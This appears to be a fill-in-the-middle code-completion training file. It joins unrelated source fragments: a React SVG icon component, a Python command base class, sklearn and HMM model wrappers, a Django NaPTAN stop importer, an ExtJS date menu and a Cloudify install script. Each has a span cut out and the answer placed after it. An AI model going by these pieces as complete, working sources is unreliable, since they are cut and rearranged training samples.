"" : " xmlns=\"" + namespace + "\""; final XmlFile xmlFile = getFile(); final XmlTag tag = XmlElementFactory.getInstance(xmlFile.getProject()).createTagFromText("<" + getXmlElementName() + nsDecl + "/>"); result[0] = ((XmlDocument)xmlFile.getDocument().replace(((XmlFile)tag.getContainingFile()).getDocument())).getRootTag(); } catch (IncorrectOperationException e) { LOG.error(e); } } }); return result[0]; } @Nonnull public final DomNameStrategy getNameStrategy() { final Class<?> rawType = getRawType(); final DomNameStrategy strategy = DomImplUtil.getDomNameStrategy(rawType, isAttribute()); if (strategy != null) { return strategy; } return DomNameStrategy.HYPHEN_STRATEGY; } }<|fim▁end|>
<|file_name|>FontAwesomeIcon.tsx<|end_file_name|><|fim▁begin|>'use strict'; import React = require('react'); export class FontAwesomeIcon extends React.Component<{ path?: string }, {}> { // NOTES: SVG path data was obtained from: https://github.com/encharm/Font-Awesome-SVG-PNG/tree/master/black/svg // They assume a viewBox of '0 0 1792 1792'. // // Styling can be done in (S)CSS using the 'fa-svg' class (for icon height/width/alignment) and 'fa-svg-path' class (for fill color). public static paths = { CaretDown: 'M1408 704q0 26-19 45l-448 448q-19 19-45 19t-45-19l-448-448q-19-19-19-45t19-45 45-19h896q26 0 45 19t19 45z', CaretRight: 'M1152 896q0 26-19 45l-448 448q-19 19-45 19t-45-19-19-45v-896q0-26 19-45t45-19 45 19l448 448q19 19 19 45z', <|fim▁hole|> TimesCircle: 'M1277 1122q0-26-19-45l-181-181 181-181q19-19 19-45 0-27-19-46l-90-90q-19-19-46-19-26 0-45 19l-181 181-181-181q-19-19-45-19-27 0-46 19l-90 90q-19 19-19 46 0 26 19 45l181 181-181 181q-19 19-19 45 0 27 19 46l90 90q19 19 46 19 26 0 45-19l181-181 181 181q19 19 45 19 27 0 46-19l90-90q19-19 19-46zm387-226q0 209-103 385.5t-279.5 279.5-385.5 103-385.5-103-279.5-279.5-103-385.5 103-385.5 279.5-279.5 385.5-103 385.5 103 279.5 279.5 103 385.5z', Warning: 'M1024 1375v-190q0-14-9.5-23.5t-22.5-9.5h-192q-13 0-22.5 9.5t-9.5 23.5v190q0 14 9.5 23.5t22.5 9.5h192q13 0 22.5-9.5t9.5-23.5zm-2-374l18-459q0-12-10-19-13-11-24-11h-220q-11 0-24 11-10 7-10 21l17 457q0 10 10 16.5t24 6.5h185q14 0 23.5-6.5t10.5-16.5zm-14-934l768 1408q35 63-2 126-17 29-46.5 46t-63.5 17h-1536q-34 0-63.5-17t-46.5-46q-37-63-2-126l768-1408q17-31 47-49t65-18 65 18 47 49z' }; public render() { return <svg className='fa-svg' viewBox='0 0 1792 1792'><path className='fa-svg-path' d={this.props.path || ''}/></svg>; } }<|fim▁end|>
<|file_name|>base.py<|end_file_name|><|fim▁begin|>""" Base classes for writing management commands (named commands which can be executed through ``tipi.py``). """ import os import sys from ConfigParser import ConfigParser from optparse import make_option, OptionParser from virtualenv import resolve_interpreter class CommandError(Exception): """ Exception class indicating a problem while executing a management command. If this exception is raised during the execution of a management command, it will be caught and turned into a nicely-printed error message to the appropriate output stream (i.e., stderr); as a result, raising this exception (with a sensible description of the error) is the preferred way to indicate that something has gone wrong in the execution of a command. """ pass class BaseCommand(object): """ The base class from which all management commands ultimately derive. Use this class if you want access to all of the mechanisms which<|fim▁hole|> parse the command-line arguments and work out what code to call in response; if you don't need to change any of that behavior, consider using one of the subclasses defined in this file. If you are interested in overriding/customizing various aspects of the command-parsing and -execution behavior, the normal flow works as follows: 1. ``tipi.py`` loads the command class and calls its ``run_from_argv()`` method. 2. The ``run_from_argv()`` method calls ``create_parser()`` to get an ``OptionParser`` for the arguments, parses them, performs any environment changes requested by options like ``pythonpath``, and then calls the ``execute()`` method, passing the parsed arguments. 3. The ``execute()`` method attempts to carry out the command by calling the ``handle()`` method with the parsed arguments; any output produced by ``handle()`` will be printed to standard output. 4. If ``handle()`` raised a ``CommandError``, ``execute()`` will instead print an error message to ``stderr``. Thus, the ``handle()`` method is typically the starting point for subclasses; many built-in commands and command types either place all of their logic in ``handle()``, or perform some additional parsing work in ``handle()`` and then delegate from it to more specialized methods as needed. Several attributes affect behavior at various steps along the way: ``args`` A string listing the arguments accepted by the command, suitable for use in help messages; e.g., a command which takes a list of application names might set this to '<appname appname ...>'. ``help`` A short description of the command, which will be printed in help messages. ``option_list`` This is the list of ``optparse`` options which will be fed into the command's ``OptionParser`` for parsing arguments. """ # Metadata about this command. option_list = ( make_option('-v', '--verbose', action='store', dest='verbose', default='1', type='choice', choices=['0', '1', '2'], help='Verbosity level; 0=minimal output, 1=normal output, 2=all output'), make_option('-p', '--python', help='The Python interpreter to use, e.g., --python=python2.5 will use the python2.5 ' 'interpreter to create the new environment. 
The default is the interpreter that ' 'virtualenv was installed with (%s)' % sys.executable), make_option('--traceback', action='store_true', help='Print traceback on exception'), ) help = '' args = '' #TODO syntax coloring support #def __init__(self): # #self.style = color_style() # try: # home = os.getenv('USERPROFILE') or os.getenv('HOME') # config = ConfigParser(open(os.path.join(home, '.tipirc'))) # except IOError: # pass # except: # pass # # self._interpreter = resolve_interpreter('python') # #@property #def python_interpreter(self): # return self._interpreter def get_version(self): """ Return the Django version, which should be correct for all built-in Django commands. User-supplied commands should override this method. """ #TODO placeholder return (0, 1, 0,) def usage(self, subcommand): """ Return a brief description of how to use this command, by default from the attribute ``self.help``. """ usage = '%%prog %s [options] %s' % (subcommand, self.args) if self.help: return '%s\n\n%s' % (usage, self.help) else: return usage def create_parser(self, prog_name, subcommand): """ Create and return the ``OptionParser`` which will be used to parse the arguments to this command. """ return OptionParser(prog=prog_name, usage=self.usage(subcommand), version=str(self.get_version()), option_list=self.option_list) def print_help(self, prog_name, subcommand): """ Print the help message for this command, derived from ``self.usage()``. """ parser = self.create_parser(prog_name, subcommand) parser.print_help() def run_from_argv(self, argv): """ Set up any environment changes requested, then run this command. """ parser = self.create_parser(argv[0], argv[1]) options, args = parser.parse_args(argv[2:]) self.execute(*args, **options.__dict__) def execute(self, *args, **options): """ Try to execute this command. If the command raises a ``CommandError``, intercept it and print it sensibly to stderr. """ try: #output = self.handle(*args, **options) print self.handle(*args, **options) #if output: # print output except CommandError, e: #sys.stderr.write(self.style.ERROR(str('Error: %s\n' % e))) sys.stderr.write(str('Error: %s\n' % e)) sys.exit(1) def handle(self, *args, **options): """ The actual logic of the command. Subclasses must implement this method. """ raise NotImplementedError() #class AppCommand(BaseCommand): # """ # A management command which takes one or more installed application # names as arguments, and does something with each of them. # # Rather than implementing ``handle()``, subclasses must implement # ``handle_app()``, which will be called once for each application. # # """ # args = '<appname appname ...>' # # def handle(self, *app_labels, **options): # from django.db import models # if not app_labels: # raise CommandError('Enter at least one appname.') # try: # app_list = [models.get_app(app_label) for app_label in app_labels] # except (ImproperlyConfigured, ImportError), e: # raise CommandError("%s. Are you sure your INSTALLED_APPS setting is correct?" % e) # output = [] # for app in app_list: # app_output = self.handle_app(app, **options) # if app_output: # output.append(app_output) # return '\n'.join(output) # # def handle_app(self, app, **options): # """ # Perform the command's actions for ``app``, which will be the # Python module corresponding to an application name given on # the command line. 
# # """ # raise NotImplementedError() class LabelCommand(BaseCommand): """ A management command which takes one or more arbitrary arguments (labels) on the command line, and does something with each of them. Rather than implementing ``handle()``, subclasses must implement ``handle_label()``, which will be called once for each label. If the arguments should be names of installed applications, use ``AppCommand`` instead. """ args = '<label label ...>' label = 'label' def handle(self, *labels, **options): if not labels: raise CommandError('Enter at least one %s.' % self.label) output = [] for label in labels: label_output = self.handle_label(label, **options) if label_output: output.append(label_output) return '\n'.join(output) def handle_label(self, label, **options): """ Perform the command's actions for ``label``, which will be the string as given on the command line. """ raise NotImplementedError() #class NoArgsCommand(BaseCommand): # """ # A command which takes no arguments on the command line. # # Rather than implementing ``handle()``, subclasses must implement # ``handle_noargs()``; ``handle()`` itself is overridden to ensure # no arguments are passed to the command. # # Attempting to pass arguments will raise ``CommandError``. # # """ # args = '' # # def handle(self, *args, **options): # if args: # raise CommandError("Command doesn't accept any arguments") # return self.handle_noargs(**options) # # def handle_noargs(self, **options): # """ # Perform this command's actions. # # """ # raise NotImplementedError() #def copy_helper(style, app_or_project, name, directory, other_name=''): # """ # Copies either a Django application layout template or a Django project # layout template into the specified directory. # # """ # # style -- A color style object (see django.core.management.color). # # app_or_project -- The string 'app' or 'project'. # # name -- The name of the application or project. # # directory -- The directory to which the layout template should be copied. # # other_name -- When copying an application layout, this should be the name # # of the project. # import re # import shutil # other = {'project': 'app', 'app': 'project'}[app_or_project] # if not re.search(r'^[_a-zA-Z]\w*$', name): # If it's not a valid directory name. # # Provide a smart error message, depending on the error. # if not re.search(r'^[_a-zA-Z]', name): # message = 'make sure the name begins with a letter or underscore' # else: # message = 'use only numbers, letters and underscores' # raise CommandError("%r is not a valid %s name. Please %s." % (name, app_or_project, message)) # top_dir = os.path.join(directory, name) # try: # os.mkdir(top_dir) # except OSError, e: # raise CommandError(e) # # # Determine where the app or project templates are. Use # # django.__path__[0] because we don't know into which directory # # django has been installed. # template_dir = os.path.join(django.__path__[0], 'conf', '%s_template' % app_or_project) # # for d, subdirs, files in os.walk(template_dir): # relative_dir = d[len(template_dir)+1:].replace('%s_name' % app_or_project, name) # if relative_dir: # os.mkdir(os.path.join(top_dir, relative_dir)) # for i, subdir in enumerate(subdirs): # if subdir.startswith('.'): # del subdirs[i] # for f in files: # if not f.endswith('.py'): # # Ignore .pyc, .pyo, .py.class etc, as they cause various # # breakages. 
# continue # path_old = os.path.join(d, f) # path_new = os.path.join(top_dir, relative_dir, f.replace('%s_name' % app_or_project, name)) # fp_old = open(path_old, 'r') # fp_new = open(path_new, 'w') # fp_new.write(fp_old.read().replace('{{ %s_name }}' % app_or_project, name).replace('{{ %s_name }}' % other, other_name)) # fp_old.close() # fp_new.close() # try: # shutil.copymode(path_old, path_new) # _make_writeable(path_new) # except OSError: # sys.stderr.write(style.NOTICE("Notice: Couldn't set permission bits on %s. You're probably using an uncommon filesystem setup. No problem.\n" % path_new)) # #def _make_writeable(filename): # """ # Make sure that the file is writeable. Useful if our source is # read-only. # # """ # import stat # if sys.platform.startswith('java'): # # On Jython there is no os.access() # return # if not os.access(filename, os.W_OK): # st = os.stat(filename) # new_permissions = stat.S_IMODE(st.st_mode) | stat.S_IWUSR # os.chmod(filename, new_permissions)<|fim▁end|>
<|file_name|>Message.js<|end_file_name|><|fim▁begin|>DS.classes.Message = function(create){ var relations = []; //check check(create, { time: DS.classes.Time, data: Match.Optional(Object) }); //create _.extend(this, create); //add relations<|fim▁hole|> this.addRelation = function(relation, reversed){ check(relation, DS.classes.Relation); check(reversed, Boolean); relations.push({ 'relation': relation, 'reversed': reversed }); }; this.getRelations = function(){ return relations; } };<|fim▁end|>
<|file_name|>Compare.rs<|end_file_name|><|fim▁begin|><|fim▁hole|><|fim▁end|>
com.hackoeur.jglm.support.Compare
<|file_name|>PlyVertexDataType.java<|end_file_name|><|fim▁begin|>package com.ripplargames.meshio.meshformats.ply; import com.ripplargames.meshio.vertices.VertexType; public class PlyVertexDataType { private final VertexType vertexType;<|fim▁hole|> public PlyVertexDataType(VertexType vertexType, PlyDataType plyDataType) { this.vertexType = vertexType; this.plyDataType = plyDataType; } public VertexType vertexType() { return vertexType; } public PlyDataType plyDataType() { return plyDataType; } }<|fim▁end|>
private final PlyDataType plyDataType;
<|file_name|>DatePicker.js<|end_file_name|><|fim▁begin|>/* This file is part of Ext JS 4.2 Copyright (c) 2011-2013 Sencha Inc Contact: http://www.sencha.com/contact GNU General Public License Usage This file may be used under the terms of the GNU General Public License version 3.0 as published by the Free Software Foundation and appearing in the file LICENSE included in the packaging of this file. Please review the following information to ensure the GNU General Public License version 3.0 requirements will be met: http://www.gnu.org/copyleft/gpl.html. If you are unsure which license is appropriate for your use, please contact the sales department at http://www.sencha.com/contact. Build date: 2013-09-18 17:18:59 (940c324ac822b840618a3a8b2b4b873f83a1a9b1) */ /** * A menu containing an Ext.picker.Date Component. * * Notes: * * - Although not listed here, the **constructor** for this class accepts all of the * configuration options of **{@link Ext.picker.Date}**. * - If subclassing DateMenu, any configuration options for the DatePicker must be applied * to the **initialConfig** property of the DateMenu. Applying {@link Ext.picker.Date Date Picker} * configuration settings to **this** will **not** affect the Date Picker's configuration. * * Example: * * @example * var dateMenu = Ext.create('Ext.menu.DatePicker', { * handler: function(dp, date){ * Ext.Msg.alert('Date Selected', 'You selected ' + Ext.Date.format(date, 'M j, Y')); * } * }); * * Ext.create('Ext.menu.Menu', { * items: [{ * text: 'Choose a date', * menu: dateMenu * },{ * iconCls: 'add16', * text: 'Icon item' * },{ * text: 'Regular item' * }] * }).showAt([5, 5]); */ Ext.define('Ext.menu.DatePicker', { extend: 'Ext.menu.Menu', alias: 'widget.datemenu', requires: [ 'Ext.picker.Date' ], /** * @cfg {Boolean} hideOnClick * False to continue showing the menu after a date is selected. */ hideOnClick : true, /** * @cfg {String} pickerId * An id to assign to the underlying date picker. */ pickerId : null, /** * @cfg {Number} maxHeight * @private */ /** * @property {Ext.picker.Date} picker * The {@link Ext.picker.Date} instance for this DateMenu */ initComponent : function(){ var me = this, cfg = Ext.apply({}, me.initialConfig); // Ensure we clear any listeners so they aren't duplicated delete cfg.listeners; Ext.apply(me, { showSeparator: false, plain: true,<|fim▁hole|> border: false, id: me.pickerId, xtype: 'datepicker' }, cfg) }); me.callParent(arguments); me.picker = me.down('datepicker'); /** * @event select * @inheritdoc Ext.picker.Date#select */ me.relayEvents(me.picker, ['select']); if (me.hideOnClick) { me.on('select', me.hidePickerOnSelect, me); } }, hidePickerOnSelect: function() { Ext.menu.Manager.hideAll(); } });<|fim▁end|>
bodyPadding: 0, // remove the body padding from the datepicker menu item so it looks like 3.3 items: Ext.applyIf({ cls: Ext.baseCSSPrefix + 'menu-date-item', margin: 0,
<|file_name|>models.py<|end_file_name|><|fim▁begin|>import sklearn.cross_validation as cv import sklearn.dummy as dummy from sklearn.mixture import GMM from sklearn.hmm import GMMHMM from sklearn import linear_model, naive_bayes import collections import itertools import pandas as pd from testResults import TestResults from counters import * import utils as utils class Model(): __metaclass__ = ABCMeta params = {} isSklearn = True def __init__(self, params, verbose=False): self.params = params self.verbose = verbose def printv(self, arg, title=None): if self.verbose: if title is not None: print title print arg @property def name(self): return self._name @abstractmethod def _train(self, data): """Returns a trained model.""" pass def _test(self, model, testData, resultObj): """Compares predictions made by specified model against test data. Returns a TestResults object. """ # restrict test data to principal component features features = self.params['features'] test = np.array(testData[features]) # predict a dialog sequence using test data # sklearn counts from 0 so add 1... if self.isSklearn: pred = [int(r) + 1 for r in list(model.predict(test))] else: pred = [int(r) for r in list(model.predict(test))] # extract true ratings from test data true = [int(rating) for rating in testData['rating'].values.tolist()] resultObj.compare(true, pred) return resultObj def loocv(self, data): """Leave-one-out cross validation using given data. Returns a TestResults objects, where results are averages from the cross validation steps. """ mask = cv.LeaveOneLabelOut(data['label'].values) results = TestResults(self.name, verbose=self.verbose) for trainMask, testMask in mask: # training trainingData = data.loc[trainMask] self.printv(trainingData, "training data:") model = self._train(trainingData) # testing testData = data.loc[testMask] self.printv(testData, "test data:") # leave p labels out for label, testGroup in testData.groupby("label"): results = self._test(model, testGroup, results) return results def kfoldscv(self, data, folds): """K-folds cross validation using given data and number of folds. Returns a TestResults objects, where results are averages from the cross validation steps. """ results = TestResults(self.name, verbose=self.verbose) labels = list(np.unique(data['label'].values)) for tr, te in cv.KFold(len(labels), n_folds=folds): trainD = data[data['label'].isin([labels[i] for i in tr])] testD = data[data['label'].isin([labels[i] for i in te])] self.printv(trainD, "training data:") self.printv(testD, "test data:") model = self._train(trainD) for label, testGroup in testD.groupby("label"): results = self._test(model, testGroup, results) return results def setFeatures(self, features): self.params['features'] = features class Dummy(Model): _name = "dummy" def _train(self, data): if 'constant' in self.params.keys(): model = dummy.DummyClassifier(strategy=self.params['strategy'], constant=self.params['constant']) else: model = dummy.DummyClassifier(strategy=self.params['strategy']) d = np.array(zip(*[data[f].values for f in self.params['features']])) y = np.array(data['rating'].values) model.fit(d, y) return model class Gmm(Model): """A Gaussian mixture model. Parameters are number of mixture components (num_mixc) and covariance type (cov_type). 
Example: model = Gmm(params = {num_mixc: 3, cov_type:'diag'}) """ _name = "GMM" def _train(self, data): """Trains a Gaussian mixture model, using the sklearn implementation.""" # parameters features = self.params['features'] num_mixc = self.params['num_mixc'] cov_type = self.params['cov_type'] # prepare data shape d = np.array(zip(*[data[f].values for f in features])) # choose high number of EM-iterations to get constant results gmm = GMM(num_mixc, cov_type, n_iter=300) gmm.fit(d) return gmm class Gmmhmm(Model): """A hidden Markov model with Gaussian mixture emissions. Parameters are number of mixture components (num_mixc), covariance type (cov_type) and states (states). One Gaussian mixture model is created for each state. Example: model = Gmmhmm(params = {'num_mixc': 3, 'cov_type': 'diag', 'states': [1,2,3,4,5]}) """ _name = "GMM-HMM" def _train(self, data): """Trains a GMMHMM model, using the sklearn implementation and maximum- likelihood estimates as HMM parameters (Hmm.mle(...)). """ # parameters features = self.params['features'] num_mixc = self.params['num_mixc'] cov_type = self.params['cov_type'] states = self.params['states'] # train one GMM for each state mixes = list() for state in states: # select data with current state label d = data[data.rating == state] # prepare data shape d = np.array(zip(*[d[f].values for f in features])) # init GMM gmm = GMM(num_mixc, cov_type) # train gmm.fit(d) mixes.append(gmm) # train HMM with init, trans, GMMs=mixes mle = Hmm.mle(MatrixCounterNoEmissions, data, states) model = GMMHMM(n_components=len(states), init_params='', gmms=mixes) model.transmat_ = mle.transition model.startprob_ = mle.initial return model class Ols(Model): """ Ordinary least squares regression """ _name = "OLS" isSklearn = True def _train(self, data): features = self.params['features'] X = np.array(zip(*[data[f].values for f in features])) y = np.array(data['rating']) model = linear_model.LinearRegression() model.fit(X, y) return model class LogisticRegression(Model): """ Logistic Regression """ _name = "Logit" isSklearn = True def _train(self, data): features = self.params['features'] X = np.array(zip(*[data[f].values for f in features])) y = np.array(data['rating']) model = linear_model.LogisticRegression(class_weight=self.params['class_weight']) model.fit(X, y) return model class GaussianNaiveBayes(Model): """ Gaussian Naive Bayes... """ _name = "G-NB" isSklearn = True def _train(self, data): features = self.params['features'] X = np.array(zip(*[data[f].values for f in features])) y = np.array(data['rating']) model = naive_bayes.GaussianNB() model.fit(X, y) return model class MultinomialNaiveBayes(Model): """ Multinomial Naive Bayes... """ _name = "M-NB" isSklearn = True def _train(self, data): features = self.params['features'] X = np.array(zip(*[data[f].values for f in features])) y = np.array(data['rating']) model = naive_bayes.MultinomialNB(alpha=self.params['alpha'], fit_prior=self.params['fit_prior']) model.fit(X, y) return model class Hmm(Model): """A hidden Markov model, using the Nltk implementation and maximum- likelihood parameter estimates. 
""" _name = "HMM" isSklearn = False Parameters = collections.namedtuple( 'Parameters', 'initial transition emission emissionAlph') class NltkWrapper(): def __init__(self, states, mle): self.model = nltk.HiddenMarkovModelTagger(mle.emissionAlph, states, mle.transition, mle.emission, mle.initial) def predict(self, obs): tagged = self.model.tag([tuple(o) for o in obs]) return [val[1] for val in tagged] def _train(self, data): features = self.params['features'] states = self.params['states'] # calculate maximum-likelihood parameter estimates mle = Hmm.mle_multipleFeatures(NltkCounter, data, states, features, self.verbose) # create nltk HMM model = Hmm.NltkWrapper(states, mle) return model @staticmethod def mle(counterClass, data, stateAlphabet, feature=False): """ Calculate maximum likelihood estimates for the HMM parameters transitions probabilites, emission probabilites, and initial state probabilites. """ f = feature is not False states = utils.dfToSequences(data, ['rating']) if f: emissionAlphabet = pd.unique(data[feature].values.ravel()) emissions = utils.dfToSequences(data, [feature]) else: emissionAlphabet = None counter = counterClass(stateAlphabet, emissionAlphabet, states) # count for each state sequence for k, seq in enumerate(states): if f: emi = emissions[k] # for each state transition for i, current in enumerate(seq): # count(current, next, first, emission) if f: emission = emi[i] else: emission = False next = seq[i + 1] if i < len(seq) - 1 else False counter.count(i, current, next, emission) return Hmm.Parameters( initial=counter.getInitialProb(), transition=counter.getTransitionProb(), emission=counter.getEmissionProb(), emissionAlph=emissionAlphabet ) @staticmethod def mle_multipleFeatures(counterClass, data, stateAlphabet, features, verbose=False): """ Calculate maximum likelihood estimates of HMM parameters. Parameters are transition probabilites, emission probabilites and initial sta<te probabilites. This method allows specifing multiple features and combines multiple emission features assuming conditional independence: P(feat1=a & feat2=b|state) = P(feat1=a|state) * P(feat2=b|state) """ p = lambda feat: Hmm.mle(DictCounter, data, stateAlphabet, feat) counter = counterClass(stateAlphabet, [], False) # calculate conditional probabilites for each feature & corresponding # emission alphabet entry.. 
# P(feat_i=emm_ij|state_k) forall: I features, J_i emissions, K states # ps = {feature:emmission distribution} emission_probs = [p(f).emission for f in features] # calculate inital state probabilites, transition probabilites using # first/any feature mle_single = Hmm.mle(counterClass, data, stateAlphabet, features[0]) initial_probs = mle_single.initial transition_probs = mle_single.transition # combine the emission alphabets of all given features emissionAlphabet = list() for f in features: emissionAlphabet.append(pd.unique(data[f].values.ravel())) # calculate all emission combinations # and according probabilities per state for comb in list(itertools.product(*emissionAlphabet)): counter.addEmissionCombination(tuple(comb)) for state in stateAlphabet: # for each individual prob of each feature for emission, featNum in zip(comb, xrange(0, len(emission_probs))): prob = emission_probs[featNum][state][emission] counter.addCombinedEmissionProb(state, tuple(comb), prob) if verbose: print("Initial Probabilities") printDictProbDist(initial_probs) print("Transition Probabilities") printCondDictProbDist(transition_probs) print("Emission Probabilities")<|fim▁hole|> initial=initial_probs, transition=transition_probs, emission=counter.getCombinedEmissionProb(), emissionAlph=counter.getEmissionCombinations() )<|fim▁end|>
printCondDictProbDist(counter.getCombinedEmissionProb()) return Hmm.Parameters(
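The Gmm docstring above shows the expected params dict. A toy end-to-end sketch of the Model API, assuming the module's own counters/testResults imports resolve and an era-appropriate scikit-learn; the column names follow the conventions the classes expect and the values are made up:

import pandas as pd

toy = pd.DataFrame({
    'f1':     [0.1, 0.4, 0.9, 0.2, 0.8, 0.5],   # one principal-component feature
    'rating': [1, 2, 3, 1, 3, 2],               # true state per turn
    'label':  [0, 0, 0, 1, 1, 1],               # one dialog per label
})

gmm = Gmm(params={'num_mixc': 2, 'cov_type': 'diag', 'features': ['f1']})
results = gmm.loocv(toy)  # leave-one-dialog-out cross validation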
<|file_name|>import_ie_naptan_xml.py<|end_file_name|><|fim▁begin|>"""Import an Irish NaPTAN XML file, obtainable from https://data.dublinked.ie/dataset/national-public-transport-nodes/resource/6d997756-4dba-40d8-8526-7385735dc345 """ import warnings import zipfile import xml.etree.cElementTree as ET from django.contrib.gis.geos import Point from django.core.management.base import BaseCommand from ...models import Locality, AdminArea, StopPoint class Command(BaseCommand): ns = {'naptan': 'http://www.naptan.org.uk/'} @staticmethod def add_arguments(parser): parser.add_argument('filenames', nargs='+', type=str) def handle_stop(self, element): stop = StopPoint( atco_code=element.find('naptan:AtcoCode', self.ns).text, locality_centre=element.find('naptan:Place/naptan:LocalityCentre', self.ns).text == 'true', active=element.get('Status') == 'active', ) for subelement in element.find('naptan:Descriptor', self.ns): tag = subelement.tag[27:] if tag == 'CommonName': stop.common_name = subelement.text elif tag == 'Street': stop.street = subelement.text elif tag == 'Indicator': stop.indicator = subelement.text.lower() else: warnings.warn('Stop {} has an unexpected property: {}'.format(stop.atco_code, tag)) stop_classification_element = element.find('naptan:StopClassification', self.ns) stop_type = stop_classification_element.find('naptan:StopType', self.ns).text if stop_type != 'class_undefined': stop.stop_type = stop_type bus_element = stop_classification_element.find('naptan:OnStreet/naptan:Bus', self.ns) if bus_element is not None: stop.bus_stop_type = bus_element.find('naptan:BusStopType', self.ns).text stop.timing_status = bus_element.find('naptan:TimingStatus', self.ns).text compass_point_element = bus_element.find( 'naptan:MarkedPoint/naptan:Bearing/naptan:CompassPoint', self.ns ) if compass_point_element is not None: stop.bearing = compass_point_element.text if stop.bus_stop_type == 'type_undefined': stop.bus_stop_type = '' place_element = element.find('naptan:Place', self.ns) location_element = place_element.find('naptan:Location', self.ns)<|fim▁hole|> if longitude_element is None: warnings.warn('Stop {} has no location'.format(stop.atco_code)) else: stop.latlong = Point(float(longitude_element.text), float(latitude_element.text)) admin_area_id = element.find('naptan:AdministrativeAreaRef', self.ns).text if not AdminArea.objects.filter(atco_code=admin_area_id).exists(): AdminArea.objects.create(id=admin_area_id, atco_code=admin_area_id, region_id='NI') stop.admin_area_id = admin_area_id locality_element = place_element.find('naptan:NptgLocalityRef', self.ns) if locality_element is not None: if not Locality.objects.filter(id=locality_element.text).exists(): Locality.objects.create(id=locality_element.text, admin_area_id=admin_area_id) stop.locality_id = locality_element.text stop.save() def handle_file(self, archive, filename): with archive.open(filename) as open_file: iterator = ET.iterparse(open_file) for _, element in iterator: tag = element.tag[27:] if tag == 'StopPoint': self.handle_stop(element) element.clear() def handle(self, *args, **options): for filename in options['filenames']: with zipfile.ZipFile(filename) as archive: for filename in archive.namelist(): self.handle_file(archive, filename)<|fim▁end|>
        longitude_element = location_element.find('naptan:Longitude', self.ns)
        latitude_element = location_element.find('naptan:Latitude', self.ns)
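handle_file() above relies on iterparse with element.clear() to keep memory flat while walking large NaPTAN documents. The same streaming pattern in isolation, as a minimal sketch; 'stops.xml' is a placeholder file name:

import xml.etree.cElementTree as ET

NAPTAN = '{http://www.naptan.org.uk/}'

def count_stop_points(path):
    count = 0
    for _, element in ET.iterparse(path):
        if element.tag == NAPTAN + 'StopPoint':
            count += 1
            element.clear()  # release finished elements so memory stays flat
    return count

if __name__ == '__main__':
    print(count_stop_points('stops.xml'))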
<|file_name|>_a4c_tomcat_install.py<|end_file_name|><|fim▁begin|>from cloudify import ctx from cloudify.exceptions import NonRecoverableError from cloudify.state import ctx_parameters as inputs import subprocess import os import re import sys import time import threading import platform from StringIO import StringIO from cloudify_rest_client import CloudifyClient from cloudify import utils if 'MANAGER_REST_PROTOCOL' in os.environ and os.environ['MANAGER_REST_PROTOCOL'] == "https": client = CloudifyClient(host=utils.get_manager_ip(), port=utils.get_manager_rest_service_port(), protocol='https', trust_all=True) else: client = CloudifyClient(host=utils.get_manager_ip(), port=utils.get_manager_rest_service_port()) def convert_env_value_to_string(envDict): for key, value in envDict.items(): envDict[str(key)] = str(envDict.pop(key)) def get_host(entity): if entity.instance.relationships: for relationship in entity.instance.relationships: if 'cloudify.relationships.contained_in' in relationship.type_hierarchy: return relationship.target return None def has_attribute_mapping(entity, attribute_name): ctx.logger.info('Check if it exists mapping for attribute {0} in {1}'.format(attribute_name, entity.node.properties)) mapping_configuration = entity.node.properties.get('_a4c_att_' + attribute_name, None) if mapping_configuration is not None: if mapping_configuration['parameters'][0] == 'SELF' and mapping_configuration['parameters'][1] == attribute_name: return False else: return True return False def process_attribute_mapping(entity, attribute_name, data_retriever_function): # This is where attribute mapping is defined in the cloudify type mapping_configuration = entity.node.properties['_a4c_att_' + attribute_name] ctx.logger.info('Mapping configuration found for attribute {0} is {1}'.format(attribute_name, mapping_configuration)) # If the mapping configuration exist and if it concerns SELF then just get attribute of the mapped attribute name # Else if it concerns TARGET then follow the relationship and retrieved the mapped attribute name from the TARGET if mapping_configuration['parameters'][0] == 'SELF': return data_retriever_function(entity, mapping_configuration['parameters'][1]) elif mapping_configuration['parameters'][0] == 'TARGET' and entity.instance.relationships: for relationship in entity.instance.relationships: if mapping_configuration['parameters'][1] in relationship.type_hierarchy: return data_retriever_function(relationship.target, mapping_configuration['parameters'][2]) return "" def get_nested_attribute(entity, attribute_names): deep_properties = get_attribute(entity, attribute_names[0]) attribute_names_iter = iter(attribute_names) next(attribute_names_iter) for attribute_name in attribute_names_iter: if deep_properties is None: return "" else: deep_properties = deep_properties.get(attribute_name, None) return deep_properties def _all_instances_get_nested_attribute(entity, attribute_names): return None def get_attribute(entity, attribute_name):<|fim▁hole|> ctx.logger.info('Mapping exists for attribute {0} with value {1}'.format(attribute_name, mapped_value)) return mapped_value # No mapping exist, try to get directly the attribute from the entity attribute_value = entity.instance.runtime_properties.get(attribute_name, None) if attribute_value is not None: ctx.logger.info('Found the attribute {0} with value {1} on the node {2}'.format(attribute_name, attribute_value, entity.node.id)) return attribute_value # Attribute retrieval fails, fall back to property property_value = 
entity.node.properties.get(attribute_name, None) if property_value is not None: return property_value # Property retrieval fails, fall back to host instance host = get_host(entity) if host is not None: ctx.logger.info('Attribute not found {0} go up to the parent node {1}'.format(attribute_name, host.node.id)) return get_attribute(host, attribute_name) # Nothing is found return "" def _all_instances_get_attribute(entity, attribute_name): result_map = {} # get all instances data using cfy rest client # we have to get the node using the rest client with node_instance.node_id # then we will have the relationships node = client.nodes.get(ctx.deployment.id, entity.node.id) all_node_instances = client.node_instances.list(ctx.deployment.id, entity.node.id) for node_instance in all_node_instances: prop_value = __recursively_get_instance_data(node, node_instance, attribute_name) if prop_value is not None: ctx.logger.info('Found the property/attribute {0} with value {1} on the node {2} instance {3}'.format(attribute_name, prop_value, entity.node.id, node_instance.id)) result_map[node_instance.id + '_'] = prop_value return result_map def get_property(entity, property_name): # Try to get the property value on the node property_value = entity.node.properties.get(property_name, None) if property_value is not None: ctx.logger.info('Found the property {0} with value {1} on the node {2}'.format(property_name, property_value, entity.node.id)) return property_value # No property found on the node, fall back to the host host = get_host(entity) if host is not None: ctx.logger.info('Property not found {0} go up to the parent node {1}'.format(property_name, host.node.id)) return get_property(host, property_name) return "" def get_instance_list(node_id): result = '' all_node_instances = client.node_instances.list(ctx.deployment.id, node_id) for node_instance in all_node_instances: if len(result) > 0: result += ',' result += node_instance.id return result def get_host_node_name(instance): for relationship in instance.relationships: if 'cloudify.relationships.contained_in' in relationship.type_hierarchy: return relationship.target.node.id return None def __get_relationship(node, target_name, relationship_type): for relationship in node.relationships: if relationship.get('target_id') == target_name and relationship_type in relationship.get('type_hierarchy'): return relationship return None def __has_attribute_mapping(node, attribute_name): ctx.logger.info('Check if it exists 